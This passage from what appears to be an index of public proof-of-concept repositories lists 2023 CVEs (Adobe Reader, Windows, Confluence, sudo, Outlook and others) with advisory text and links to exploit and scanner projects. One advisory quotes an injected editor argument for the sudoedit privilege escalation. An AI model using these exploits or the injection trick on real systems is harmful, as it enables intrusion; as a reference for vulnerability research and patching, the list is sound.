[Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk) + +### CVE-2023-21608 (2023-01-18) + +Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [hacksysteam/CVE-2023-21608](https://github.com/hacksysteam/CVE-2023-21608) +- [Malwareman007/CVE-2023-21608](https://github.com/Malwareman007/CVE-2023-21608) + +### CVE-2023-21674 (2023-01-10) + +Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability + + +- [hd3s5aa/CVE-2023-21674](https://github.com/hd3s5aa/CVE-2023-21674) + +### CVE-2023-21707 (2023-02-14) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [N1k0la-T/CVE-2023-21707](https://github.com/N1k0la-T/CVE-2023-21707) + +### CVE-2023-21716 (2023-02-14) + +Microsoft Word Remote Code Execution Vulnerability + + +- [FeatherStark/CVE-2023-21716](https://github.com/FeatherStark/CVE-2023-21716) +- [Xnuvers007/CVE-2023-21716](https://github.com/Xnuvers007/CVE-2023-21716) +- [gyaansastra/CVE-2023-21716](https://github.com/gyaansastra/CVE-2023-21716) +- [mikesxrs/CVE-2023-21716_YARA_Results](https://github.com/mikesxrs/CVE-2023-21716_YARA_Results) +- [3yujw7njai/CVE-2023-21716-POC](https://github.com/3yujw7njai/CVE-2023-21716-POC) +- [hv0l/CVE-2023-21716_exploit](https://github.com/hv0l/CVE-2023-21716_exploit) +- [JMousqueton/CVE-2023-21716](https://github.com/JMousqueton/CVE-2023-21716) +- [Lord-of-the-IoT/CVE-2023-21716](https://github.com/Lord-of-the-IoT/CVE-2023-21716) +- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py) +- [RonF98/CVE-2023-21716-POC](https://github.com/RonF98/CVE-2023-21716-POC) + +### CVE-2023-21739 (2023-01-10) + +Windows Bluetooth Driver Elevation of Privilege Vulnerability + + +- [gmh5225/CVE-2023-21739](https://github.com/gmh5225/CVE-2023-21739) + +### CVE-2023-21742 (2023-01-10) + +Microsoft SharePoint Server Remote Code Execution Vulnerability + + +- [ohnonoyesyes/CVE-2023-21742](https://github.com/ohnonoyesyes/CVE-2023-21742) + +### CVE-2023-21746 (2023-01-10) + +Windows NTLM Elevation of Privilege Vulnerability + + +- [Muhammad-Ali007/LocalPotato_CVE-2023-21746](https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746) + +### CVE-2023-21752 (2023-01-10) + +Windows Backup Service Elevation of Privilege Vulnerability + + +- [Wh04m1001/CVE-2023-21752](https://github.com/Wh04m1001/CVE-2023-21752) +- [yosef0x01/CVE-2023-21752](https://github.com/yosef0x01/CVE-2023-21752) + +### CVE-2023-21766 (2023-01-10) + +Windows Overlay Filter Information Disclosure Vulnerability + + +- [Y3A/cve-2023-21766](https://github.com/Y3A/cve-2023-21766) + +### CVE-2023-21768 (2023-01-10) + +Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability + + +- [chompie1337/Windows_LPE_AFD_CVE-2023-21768](https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768) +- [cl4ym0re/cve-2023-21768-compiled](https://github.com/cl4ym0re/cve-2023-21768-compiled) +- [SamuelTulach/nullmap](https://github.com/SamuelTulach/nullmap) +- [Malwareman007/CVE-2023-21768](https://github.com/Malwareman007/CVE-2023-21768) +- [HKxiaoli/Windows_AFD_LPE_CVE-2023-21768](https://github.com/HKxiaoli/Windows_AFD_LPE_CVE-2023-21768) +- [3yujw7njai/CVE-2023-21768-POC](https://github.com/3yujw7njai/CVE-2023-21768-POC) +- [h1bAna/CVE-2023-21768](https://github.com/h1bAna/CVE-2023-21768) +- [zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit](https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit) +- [Rosayxy/Recreate-cve-2023-21768](https://github.com/Rosayxy/Recreate-cve-2023-21768) +- [ldrx30/CVE-2023-21768](https://github.com/ldrx30/CVE-2023-21768) +- [xboxoneresearch/CVE-2023-21768-dotnet](https://github.com/xboxoneresearch/CVE-2023-21768-dotnet) + +### CVE-2023-21823 (2023-02-14) + +Windows Graphics Component Remote Code Execution Vulnerability + + +- [Elizarfish/CVE-2023-21823](https://github.com/Elizarfish/CVE-2023-21823) + +### CVE-2023-21837 (2023-01-17) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [hktalent/CVE-2023-21837](https://github.com/hktalent/CVE-2023-21837) + +### CVE-2023-21839 (2023-01-17) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [DXask88MA/Weblogic-CVE-2023-21839](https://github.com/DXask88MA/Weblogic-CVE-2023-21839) +- [ASkyeye/CVE-2023-21839](https://github.com/ASkyeye/CVE-2023-21839) +- [Firebasky/CVE-2023-21839](https://github.com/Firebasky/CVE-2023-21839) +- [houqe/POC_CVE-2023-21839](https://github.com/houqe/POC_CVE-2023-21839) +- [kw3h4/CVE-2023-21839-metasploit-scanner](https://github.com/kw3h4/CVE-2023-21839-metasploit-scanner) +- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test) +- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931) + +### CVE-2023-21887 (2023-01-17) + +Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). + + +- [zwxxb/CVE-2023-21887](https://github.com/zwxxb/CVE-2023-21887) + +### CVE-2023-21931 (2023-04-18) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). + + +- [TimeSHU/weblogic_CVE-2023-21931_POC-EXP](https://github.com/TimeSHU/weblogic_CVE-2023-21931_POC-EXP) + +### CVE-2023-21939 (2023-04-18) + +Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N). + + +- [Y4Sec-Team/CVE-2023-21939](https://github.com/Y4Sec-Team/CVE-2023-21939) + +### CVE-2023-21971 (2023-04-18) + +Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.32 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors as well as unauthorized update, insert or delete access to some of MySQL Connectors accessible data and unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:H). + + +- [Avento/CVE-2023-21971_Analysis](https://github.com/Avento/CVE-2023-21971_Analysis) + +### CVE-2023-21987 (2023-04-18) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.44 and Prior to 7.0.8. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H). + + +- [chunzhennn/cve-2023-21987-poc](https://github.com/chunzhennn/cve-2023-21987-poc) + +### CVE-2023-22074 (2023-10-17) + +Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Supported versions that are affected are 19.3-19.20 and 21.3-21.11. Easily exploitable vulnerability allows high privileged attacker having Create Session, Select Any Dictionary privilege with network access via Oracle Net to compromise Oracle Database Sharding. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Database Sharding. CVSS 3.1 Base Score 2.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L). + + +- [emad-almousa/CVE-2023-22074](https://github.com/emad-almousa/CVE-2023-22074) + +### CVE-2023-22098 (2023-10-17) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.12. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: Only applicable to 7.0.x platform. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). + + +- [Diego-AltF4/CVE-2023-22098](https://github.com/Diego-AltF4/CVE-2023-22098) + +### CVE-2023-22432 (2023-03-05) + +Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack. + + +- [aeyesec/CVE-2023-22432](https://github.com/aeyesec/CVE-2023-22432) + +### CVE-2023-22490 (2023-02-14) + +Git is a revision control system. Using a specially-crafted repository, Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone optimization even when using a non-local transport. Though Git will abort local clones whose source `$GIT_DIR/objects` directory contains symbolic links, the `objects` directory itself may still be a symbolic link. These two may be combined to include arbitrary files based on known paths on the victim's filesystem within the malicious repository's working copy, allowing for data exfiltration in a similar manner as CVE-2022-39253.\n\nA fix has been prepared and will appear in v2.39.2 v2.38.4 v2.37.6 v2.36.5 v2.35.7 v2.34.7 v2.33.7 v2.32.6, v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds are available. Avoid cloning repositories from untrusted sources with `--recurse-submodules`. Instead, consider cloning repositories without recursively cloning their submodules, and instead run `git submodule update` at each layer. Before doing so, inspect each new `.gitmodules` file to ensure that it does not contain suspicious module URLs. + + +- [smash8tap/CVE-2023-22490_PoC](https://github.com/smash8tap/CVE-2023-22490_PoC) + +### CVE-2023-22515 (2023-10-04) + +Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. \r\n\r\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. + + +- [ErikWynter/CVE-2023-22515-Scan](https://github.com/ErikWynter/CVE-2023-22515-Scan) +- [j3seer/CVE-2023-22515-POC](https://github.com/j3seer/CVE-2023-22515-POC) +- [Chocapikk/CVE-2023-22515](https://github.com/Chocapikk/CVE-2023-22515) +- [ad-calcium/CVE-2023-22515](https://github.com/ad-calcium/CVE-2023-22515) +- [kh4sh3i/CVE-2023-22515](https://github.com/kh4sh3i/CVE-2023-22515) +- [sincere9/CVE-2023-22515](https://github.com/sincere9/CVE-2023-22515) +- [Le1a/CVE-2023-22515](https://github.com/Le1a/CVE-2023-22515) +- [Vulnmachines/confluence-cve-2023-22515](https://github.com/Vulnmachines/confluence-cve-2023-22515) +- [iveresk/CVE-2023-22515](https://github.com/iveresk/CVE-2023-22515) +- [youcannotseemeagain/CVE-2023-22515_RCE](https://github.com/youcannotseemeagain/CVE-2023-22515_RCE) +- [DsaHen/cve-2023-22515-exp](https://github.com/DsaHen/cve-2023-22515-exp) +- [joaoviictorti/CVE-2023-22515](https://github.com/joaoviictorti/CVE-2023-22515) +- [C1ph3rX13/CVE-2023-22515](https://github.com/C1ph3rX13/CVE-2023-22515) +- [AIex-3/confluence-hack](https://github.com/AIex-3/confluence-hack) +- [LucasPDiniz/CVE-2023-22515](https://github.com/LucasPDiniz/CVE-2023-22515) +- [aaaademo/Confluence-EvilJar](https://github.com/aaaademo/Confluence-EvilJar) +- [edsonjt81/CVE-2023-22515-Scan.](https://github.com/edsonjt81/CVE-2023-22515-Scan.) +- [INTfinityConsulting/cve-2023-22515](https://github.com/INTfinityConsulting/cve-2023-22515) +- [CalegariMindSec/Exploit-CVE-2023-22515](https://github.com/CalegariMindSec/Exploit-CVE-2023-22515) +- [rxerium/CVE-2023-22515](https://github.com/rxerium/CVE-2023-22515) +- [fyx1t/NSE--CVE-2023-22515](https://github.com/fyx1t/NSE--CVE-2023-22515) +- [s1d6point7bugcrowd/CVE-2023-22515-check](https://github.com/s1d6point7bugcrowd/CVE-2023-22515-check) +- [xorbbo/cve-2023-22515](https://github.com/xorbbo/cve-2023-22515) +- [spareack/CVE-2023-22515-NSE](https://github.com/spareack/CVE-2023-22515-NSE) +- [Onedy1703/CVE-2023-22515-Confluence](https://github.com/Onedy1703/CVE-2023-22515-Confluence) + +### CVE-2023-22518 (2023-10-31) + +All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability. \n\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue. + + +- [ForceFledgling/CVE-2023-22518](https://github.com/ForceFledgling/CVE-2023-22518) +- [davidfortytwo/CVE-2023-22518](https://github.com/davidfortytwo/CVE-2023-22518) +- [RevoltSecurities/CVE-2023-22518](https://github.com/RevoltSecurities/CVE-2023-22518) +- [0x0d3ad/CVE-2023-22518](https://github.com/0x0d3ad/CVE-2023-22518) +- [C1ph3rX13/CVE-2023-22518](https://github.com/C1ph3rX13/CVE-2023-22518) +- [bibo318/CVE-2023-22518](https://github.com/bibo318/CVE-2023-22518) +- [Lilly-dox/Exploit-CVE-2023-22518](https://github.com/Lilly-dox/Exploit-CVE-2023-22518) + +### CVE-2023-22524 (2023-12-06) + +Certain versions of the Atlassian Companion App for MacOS were affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion’s blocklist and MacOS Gatekeeper to allow execution of code. + + +- [imperva/CVE-2023-22524](https://github.com/imperva/CVE-2023-22524) +- [ron-imperva/CVE-2023-22524](https://github.com/ron-imperva/CVE-2023-22524) + +### CVE-2023-22527 (2024-01-16) + +A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\n\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin. + + +- [Avento/CVE-2023-22527_Confluence_RCE](https://github.com/Avento/CVE-2023-22527_Confluence_RCE) +- [Sudistark/patch-diff-CVE-2023-22527](https://github.com/Sudistark/patch-diff-CVE-2023-22527) +- [ga0we1/CVE-2023-22527_Confluence_RCE](https://github.com/ga0we1/CVE-2023-22527_Confluence_RCE) +- [Drun1baby/CVE-2023-22527](https://github.com/Drun1baby/CVE-2023-22527) +- [cleverg0d/CVE-2023-22527](https://github.com/cleverg0d/CVE-2023-22527) +- [thanhlam-attt/CVE-2023-22527](https://github.com/thanhlam-attt/CVE-2023-22527) +- [Manh130902/CVE-2023-22527-POC](https://github.com/Manh130902/CVE-2023-22527-POC) +- [VNCERT-CC/CVE-2023-22527-confluence](https://github.com/VNCERT-CC/CVE-2023-22527-confluence) +- [Vozec/CVE-2023-22527](https://github.com/Vozec/CVE-2023-22527) +- [C1ph3rX13/CVE-2023-22527](https://github.com/C1ph3rX13/CVE-2023-22527) +- [Niuwoo/CVE-2023-22527](https://github.com/Niuwoo/CVE-2023-22527) +- [Chocapikk/CVE-2023-22527](https://github.com/Chocapikk/CVE-2023-22527) +- [RevoltSecurities/CVE-2023-22527](https://github.com/RevoltSecurities/CVE-2023-22527) +- [yoryio/CVE-2023-22527](https://github.com/yoryio/CVE-2023-22527) +- [Privia-Security/CVE-2023-22527](https://github.com/Privia-Security/CVE-2023-22527) +- [MaanVader/CVE-2023-22527-POC](https://github.com/MaanVader/CVE-2023-22527-POC) +- [adminlove520/CVE-2023-22527](https://github.com/adminlove520/CVE-2023-22527) +- [YongYe-Security/CVE-2023-22527](https://github.com/YongYe-Security/CVE-2023-22527) +- [Boogipop/CVE-2023-22527-Godzilla-MEMSHELL](https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL) +- [M0untainShley/CVE-2023-22527-MEMSHELL](https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL) +- [vulncheck-oss/cve-2023-22527](https://github.com/vulncheck-oss/cve-2023-22527) +- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE) +- [kh4sh3i/CVE-2023-22527](https://github.com/kh4sh3i/CVE-2023-22527) +- [AxthonyV/CVE-2023-22527](https://github.com/AxthonyV/CVE-2023-22527) + +### CVE-2023-22551 (2023-01-01) + +The FTP (aka "Implementation of a simple FTP client and server") project through 96c1a35 allows remote attackers to cause a denial of service (memory consumption) by engaging in client activity, such as establishing and then terminating a connection. This occurs because malloc is used but free is not. + + +- [viswagb/CVE-2023-22551](https://github.com/viswagb/CVE-2023-22551) + +### CVE-2023-22621 (2023-04-19) + +Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution. + + +- [sofianeelhor/CVE-2023-22621-POC](https://github.com/sofianeelhor/CVE-2023-22621-POC) + +### CVE-2023-22622 (2023-01-05) + +WordPress through 6.1.1 depends on unpredictable client visits to cause wp-cron.php execution and the resulting security updates, and the source code describes "the scenario where a site may not receive enough visits to execute scheduled tasks in a timely manner," but neither the installation guide nor the security guide mentions this default behavior, or alerts the user about security risks on installations with very few visits. + + +- [michael-david-fry/CVE-2023-22622](https://github.com/michael-david-fry/CVE-2023-22622) + +### CVE-2023-22726 (2023-01-20) + +act is a project which allows for local running of github actions. The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. The /upload endpoint is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. The /artifact endpoint is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server. This has been addressed in version 0.2.40. Users are advised to upgrade. Users unable to upgrade may, during implementation of Open and OpenAtEnd for FS, ensure to use ValidPath() to check against path traversal or clean the user-provided paths manually. + + +- [ProxyPog/POC-CVE-2023-22726](https://github.com/ProxyPog/POC-CVE-2023-22726) + +### CVE-2023-22809 (2023-01-18) + +In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value. + + +- [n3m1sys/CVE-2023-22809-sudoedit-privesc](https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc) +- [M4fiaB0y/CVE-2023-22809](https://github.com/M4fiaB0y/CVE-2023-22809) +- [3yujw7njai/CVE-2023-22809-sudo-POC](https://github.com/3yujw7njai/CVE-2023-22809-sudo-POC) +- [hello4r1end/patch_CVE-2023-22809](https://github.com/hello4r1end/patch_CVE-2023-22809) +- [Chan9Yan9/CVE-2023-22809](https://github.com/Chan9Yan9/CVE-2023-22809) +- [pashayogi/CVE-2023-22809](https://github.com/pashayogi/CVE-2023-22809) +- [asepsaepdin/CVE-2023-22809](https://github.com/asepsaepdin/CVE-2023-22809) +- [Toothless5143/CVE-2023-22809](https://github.com/Toothless5143/CVE-2023-22809) +- [AntiVlad/CVE-2023-22809](https://github.com/AntiVlad/CVE-2023-22809) +- [laxmiyamkolu/SUDO-privilege-escalation](https://github.com/laxmiyamkolu/SUDO-privilege-escalation) +- [D0rDa4aN919/CVE-2023-22809-Exploiter](https://github.com/D0rDa4aN919/CVE-2023-22809-Exploiter) + +### CVE-2023-22855 (2023-02-15) + +Kardex Mlog MCC 5.7.12+0-a203c2a213-master allows remote code execution. It spawns a web interface listening on port 8088. A user-controllable path is handed to a path-concatenation method (Path.Combine from .NET) without proper sanitisation. This yields the possibility of including local files, as well as remote files on SMB shares. If one provides a file with the extension .t4, it is rendered with the .NET templating engine mono/t4, which can execute code. + + +- [vianic/CVE-2023-22855](https://github.com/vianic/CVE-2023-22855) + +### CVE-2023-22884 (2023-01-21) + +Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.\n\n + + +- [jakabakos/CVE-2023-22884-Airflow-SQLi](https://github.com/jakabakos/CVE-2023-22884-Airflow-SQLi) + +### CVE-2023-22894 (2023-04-19) + +Strapi through 4.5.5 allows attackers (with access to the admin panel) to discover sensitive user details by exploiting the query filter. The attacker can filter users by columns that contain sensitive information and infer a value from API responses. If the attacker has super admin access, then this can be exploited to discover the password hash and password reset token of all users. If the attacker has admin panel access to an account with permission to access the username and email of API users with a lower privileged role (e.g., Editor or Author), then this can be exploited to discover sensitive information for all API users but not other admin accounts. + + +- [Saboor-Hakimi/CVE-2023-22894](https://github.com/Saboor-Hakimi/CVE-2023-22894) + +### CVE-2023-22906 (2023-07-03) + +Hero Qubo HCD01_02_V1.38_20220125 devices allow TELNET access with root privileges by default, without a password. + + +- [nonamecoder/CVE-2023-22906](https://github.com/nonamecoder/CVE-2023-22906) + +### CVE-2023-22941 (2023-02-14) + +In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, an improperly-formatted ‘INGEST_EVAL’ parameter in a Field Transformation crashes the Splunk daemon (splunkd). + + +- [eduardosantos1989/CVE-2023-22941](https://github.com/eduardosantos1989/CVE-2023-22941) + +### CVE-2023-22960 (2023-01-23) + +Lexmark products through 2023-01-10 have Improper Control of Interaction Frequency. + + +- [t3l3machus/CVE-2023-22960](https://github.com/t3l3machus/CVE-2023-22960) + +### CVE-2023-22974 (2023-02-22) + +A Path Traversal in setup.php in OpenEMR < 7.0.0 allows remote unauthenticated users to read arbitrary files by controlling a connection to an attacker-controlled MySQL server. + + +- [gbrsh/CVE-2023-22974](https://github.com/gbrsh/CVE-2023-22974) + +### CVE-2023-23138 +- [OmarAtallahh/CVE-2023-23138](https://github.com/OmarAtallahh/CVE-2023-23138) + +### CVE-2023-23169 (2023-05-12) + +Synapsoft pdfocus 1.17 is vulnerable to local file inclusion and server-side request forgery Directory Traversal. + + +- [S4nshine/CVE-2023-23169](https://github.com/S4nshine/CVE-2023-23169) + +### CVE-2023-23192 (2023-03-23) + +IS Decisions UserLock MFA 11.01 is vulnerable to authentication bypass using scheduled task. + + +- [pinarsadioglu/CVE-2023-23192](https://github.com/pinarsadioglu/CVE-2023-23192) +- [Penkyzduyi/CVE-2023-23192](https://github.com/Penkyzduyi/CVE-2023-23192) + +### CVE-2023-23279 (2023-02-17) + +Canteen Management System 1.0 is vulnerable to SQL Injection via /php_action/getOrderReport.php. + + +- [tuannq2299/CVE-2023-23279](https://github.com/tuannq2299/CVE-2023-23279) + +### CVE-2023-23333 (2023-02-06) + +There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php. + + +- [Timorlover/CVE-2023-23333](https://github.com/Timorlover/CVE-2023-23333) +- [Mr-xn/CVE-2023-23333](https://github.com/Mr-xn/CVE-2023-23333) +- [emanueldosreis/nmap-CVE-2023-23333-exploit](https://github.com/emanueldosreis/nmap-CVE-2023-23333-exploit) + +### CVE-2023-23388 (2023-03-14) + +Windows Bluetooth Driver Elevation of Privilege Vulnerability + + +- [ynwarcs/CVE-2023-23388](https://github.com/ynwarcs/CVE-2023-23388) + +### CVE-2023-23396 (2023-03-14) + +Microsoft Excel Denial of Service Vulnerability + + +- [LucaBarile/CVE-2023-23396](https://github.com/LucaBarile/CVE-2023-23396) + +### CVE-2023-23397 (2023-03-14) + +Microsoft Outlook Elevation of Privilege Vulnerability + + +- [sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY](https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY) +- [j0eyv/CVE-2023-23397](https://github.com/j0eyv/CVE-2023-23397) +- [alicangnll/CVE-2023-23397](https://github.com/alicangnll/CVE-2023-23397) +- [grn-bogo/CVE-2023-23397](https://github.com/grn-bogo/CVE-2023-23397) +- [ka7ana/CVE-2023-23397](https://github.com/ka7ana/CVE-2023-23397) +- [api0cradle/CVE-2023-23397-POC-Powershell](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell) +- [im007/CVE-2023-23397](https://github.com/im007/CVE-2023-23397) +- [cleverg0d/CVE-2023-23397-PoC-PowerShell](https://github.com/cleverg0d/CVE-2023-23397-PoC-PowerShell) +- [ahmedkhlief/CVE-2023-23397-POC](https://github.com/ahmedkhlief/CVE-2023-23397-POC) +- [BillSkiCO/CVE-2023-23397_EXPLOIT](https://github.com/BillSkiCO/CVE-2023-23397_EXPLOIT) +- [djackreuter/CVE-2023-23397-PoC](https://github.com/djackreuter/CVE-2023-23397-PoC) +- [moneertv/CVE-2023-23397](https://github.com/moneertv/CVE-2023-23397) +- [ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook](https://github.com/ahmedkhlief/CVE-2023-23397-POC-Using-Interop-Outlook) +- [Trackflaw/CVE-2023-23397](https://github.com/Trackflaw/CVE-2023-23397) +- [SecCTechs/CVE-2023-23397](https://github.com/SecCTechs/CVE-2023-23397) +- [tiepologian/CVE-2023-23397](https://github.com/tiepologian/CVE-2023-23397) +- [BronzeBee/cve-2023-23397](https://github.com/BronzeBee/cve-2023-23397) +- [stevesec/CVE-2023-23397](https://github.com/stevesec/CVE-2023-23397) +- [Cyb3rMaddy/CVE-2023-23397-Report](https://github.com/Cyb3rMaddy/CVE-2023-23397-Report) +- [Zeppperoni/CVE-2023-23397-Patch](https://github.com/Zeppperoni/CVE-2023-23397-Patch) +- [jacquesquail/CVE-2023-23397](https://github.com/jacquesquail/CVE-2023-23397) +- [3yujw7njai/CVE-2023-23397-POC](https://github.com/3yujw7njai/CVE-2023-23397-POC) +- [vlad-a-man/CVE-2023-23397](https://github.com/vlad-a-man/CVE-2023-23397) +- [Muhammad-Ali007/OutlookNTLM_CVE-2023-23397](https://github.com/Muhammad-Ali007/OutlookNTLM_CVE-2023-23397) +- [Pushkarup/CVE-2023-23397](https://github.com/Pushkarup/CVE-2023-23397) +- 